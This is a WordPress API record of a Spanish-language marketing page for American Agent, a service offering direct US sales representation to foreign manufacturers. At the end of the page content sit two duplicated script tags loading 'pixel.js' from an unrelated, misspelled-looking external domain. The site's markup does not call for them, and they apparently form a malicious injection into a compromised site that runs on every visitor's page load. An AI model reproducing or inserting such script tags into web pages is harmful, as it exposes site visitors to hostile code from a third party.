{"id":3107,"date":"2014-08-30T10:05:23","date_gmt":"2014-08-30T14:05:23","guid":{"rendered":"https:\/\/americanagent.com\/direct-usa-sales-2-2\/"},"modified":"2014-09-10T16:32:30","modified_gmt":"2014-09-10T20:32:30","slug":"estrategia-de-ventas-directa-de-eeuu","status":"publish","type":"page","link":"https:\/\/americanagent.com\/es\/estrategia-de-ventas-directa-de-eeuu\/","title":{"rendered":"Estrategia de ventas directa de EE.UU."},"content":{"rendered":"<div  class='flex_column av-av_one_full-2a9015ff38129c418a3f2eafba3e9512 av_one_full  avia-builder-el-0  avia-builder-el-no-sibling  first flex_column_div  '     ><p>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-av_heading-5a178240d104e0e7768be842530e2854\">\n#top .av-special-heading.av-av_heading-5a178240d104e0e7768be842530e2854{\npadding-bottom:10px;\n}\nbody .av-special-heading.av-av_heading-5a178240d104e0e7768be842530e2854 .av-special-heading-tag .heading-char{\nfont-size:25px;\n}\n.av-special-heading.av-av_heading-5a178240d104e0e7768be842530e2854 .av-subheading{\nfont-size:15px;\n}\n<\/style>\n<div  class='av-special-heading av-av_heading-5a178240d104e0e7768be842530e2854 av-special-heading-h3  avia-builder-el-1  el_before_av_textblock  avia-builder-el-first '><h3 class='av-special-heading-tag '  itemprop=\"headline\"  >Vender en Estados Unidos<\/h3><div class=\"special-heading-border\"><div class=\"special-heading-inner-border\"><\/div><\/div><\/div><br \/>\n<section  class='av_textblock_section av-av_textblock-7f317741ca2418a36614f046e139f8be '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock'  itemprop=\"text\" ><p>La compa\u00f1\u00eda American Agent es capaz de llevar a cabo una venta potente y directa aqu\u00ed en los EE.UU.<\/p>\n<p>Actualmente muchas empresas estadounidenses requieren relaciones directas con sus proveedores. Muchos compradores tienen instrucciones claras para trabajar s\u00f3lo con los fabricantes y proveedores que ofrecen relaci\u00f3n de compra directa.<\/p>\n<p>Comprendemos que durante d\u00e9cadas el uso de representantes a comisi\u00f3n ha sido quiz\u00e1s la forma en que ha estado operando, pero desgraciadamente, aqu\u00ed en los EE.UU. este tipo de enfoque no va a permitir que usted alcance los resultados de ventas que esperaba. Cada semana tenemos contacto con una empresa que se ha dado cuenta de esto &#8211; s\u00f3lo despu\u00e9s haber invertido un mont\u00f3n de energ\u00eda, tiempo y dinero.<\/p>\n<p>Nuestra oficina est\u00e1 preparada para contactar con las empresas estadounidenses que son el objetivo de su proyecto. Nos pondremos en contacto con cada una de ellas, localizaremos su Departamento de Compras y a el comprador adecuado para su sector.<\/p>\n<p>Explicamos al comprador que estamos contactando con ellos para establecer una relaci\u00f3n directa con su empresa, incluidos los precios directos, somos capaces de captar su inter\u00e9s de inmediato e iniciar el proceso de venta para usted.<\/p>\n<p>Trabajar con nuestra oficina le permite mantenerse enfocado en los territorios m\u00e1s cerca de su zona horaria, solo va a invertir su tiempo cuando tengamos un contacto estadounidense cualificado que exprese un inter\u00e9s fiable. Usted nos puede considerar como su propia oficina de ventas en Am\u00e9rica.<\/p>\n<p>Visite tambi\u00e9n la otra \u00e1rea, &#8220;Servicios de asistencia&#8221;. El hecho de operar directamente en los EE.UU. requiere a menudo que usted tenga que manejar otras \u00e1reas de negocio tambi\u00e9n. American Agent est\u00e1 bien preparado para encontrar las mejores soluciones para una situaci\u00f3n determinada, proporcionando una soluci\u00f3n americana completa para su empresa.<\/p>\n<\/div><\/section><\/p><\/div><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":2,"comment_status":"open","ping_status":"open","template":"","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"class_list":["post-3107","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>American Agent - Vender en Estados Unidos<\/title>\n<meta name=\"description\" content=\"Muchas empresas europeas est\u00e1n operando con \u00e9xito en los EE.UU. con una estrategia de ventas muy directa.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/americanagent.com\/es\/estrategia-de-ventas-directa-de-eeuu\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"American Agent - Vender en Estados Unidos\" \/>\n<meta property=\"og:description\" content=\"Muchas empresas europeas est\u00e1n operando con \u00e9xito en los EE.UU. con una estrategia de ventas muy directa.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/americanagent.com\/es\/estrategia-de-ventas-directa-de-eeuu\/\" \/>\n<meta property=\"og:site_name\" content=\"American Agent - USA Sales Services and Distributor Search Services\" \/>\n<meta property=\"article:modified_time\" content=\"2014-09-10T20:32:30+00:00\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/es\\\/estrategia-de-ventas-directa-de-eeuu\\\/\",\"url\":\"https:\\\/\\\/americanagent.com\\\/es\\\/estrategia-de-ventas-directa-de-eeuu\\\/\",\"name\":\"American Agent - Vender en Estados Unidos\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/es\\\/#website\"},\"datePublished\":\"2014-08-30T14:05:23+00:00\",\"dateModified\":\"2014-09-10T20:32:30+00:00\",\"description\":\"Muchas empresas europeas est\u00e1n operando con \u00e9xito en los EE.UU. con una estrategia de ventas muy directa.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/es\\\/estrategia-de-ventas-directa-de-eeuu\\\/#breadcrumb\"},\"inLanguage\":\"es-ES\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/americanagent.com\\\/es\\\/estrategia-de-ventas-directa-de-eeuu\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/es\\\/estrategia-de-ventas-directa-de-eeuu\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/americanagent.com\\\/es\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Estrategia de ventas directa de EE.UU.\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/es\\\/#website\",\"url\":\"https:\\\/\\\/americanagent.com\\\/es\\\/\",\"name\":\"American Agent - USA Sales Services and Distributor Search Services\",\"description\":\"USA Sales services and Distributor, Importer and Reseller Search services.\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/americanagent.com\\\/es\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es-ES\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"American Agent - Vender en Estados Unidos","description":"Muchas empresas europeas est\u00e1n operando con \u00e9xito en los EE.UU. con una estrategia de ventas muy directa.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/americanagent.com\/es\/estrategia-de-ventas-directa-de-eeuu\/","og_locale":"es_ES","og_type":"article","og_title":"American Agent - Vender en Estados Unidos","og_description":"Muchas empresas europeas est\u00e1n operando con \u00e9xito en los EE.UU. con una estrategia de ventas muy directa.","og_url":"https:\/\/americanagent.com\/es\/estrategia-de-ventas-directa-de-eeuu\/","og_site_name":"American Agent - USA Sales Services and Distributor Search Services","article_modified_time":"2014-09-10T20:32:30+00:00","twitter_misc":{"Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/americanagent.com\/es\/estrategia-de-ventas-directa-de-eeuu\/","url":"https:\/\/americanagent.com\/es\/estrategia-de-ventas-directa-de-eeuu\/","name":"American Agent - Vender en Estados Unidos","isPartOf":{"@id":"https:\/\/americanagent.com\/es\/#website"},"datePublished":"2014-08-30T14:05:23+00:00","dateModified":"2014-09-10T20:32:30+00:00","description":"Muchas empresas europeas est\u00e1n operando con \u00e9xito en los EE.UU. con una estrategia de ventas muy directa.","breadcrumb":{"@id":"https:\/\/americanagent.com\/es\/estrategia-de-ventas-directa-de-eeuu\/#breadcrumb"},"inLanguage":"es-ES","potentialAction":[{"@type":"ReadAction","target":["https:\/\/americanagent.com\/es\/estrategia-de-ventas-directa-de-eeuu\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/americanagent.com\/es\/estrategia-de-ventas-directa-de-eeuu\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/americanagent.com\/es\/"},{"@type":"ListItem","position":2,"name":"Estrategia de ventas directa de EE.UU."}]},{"@type":"WebSite","@id":"https:\/\/americanagent.com\/es\/#website","url":"https:\/\/americanagent.com\/es\/","name":"American Agent - USA Sales Services and Distributor Search Services","description":"USA Sales services and Distributor, Importer and Reseller Search services.","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/americanagent.com\/es\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es-ES"}]}},"_links":{"self":[{"href":"https:\/\/americanagent.com\/es\/wp-json\/wp\/v2\/pages\/3107","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/americanagent.com\/es\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/americanagent.com\/es\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/americanagent.com\/es\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/americanagent.com\/es\/wp-json\/wp\/v2\/comments?post=3107"}],"version-history":[{"count":0,"href":"https:\/\/americanagent.com\/es\/wp-json\/wp\/v2\/pages\/3107\/revisions"}],"wp:attachment":[{"href":"https:\/\/americanagent.com\/es\/wp-json\/wp\/v2\/media?parent=3107"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}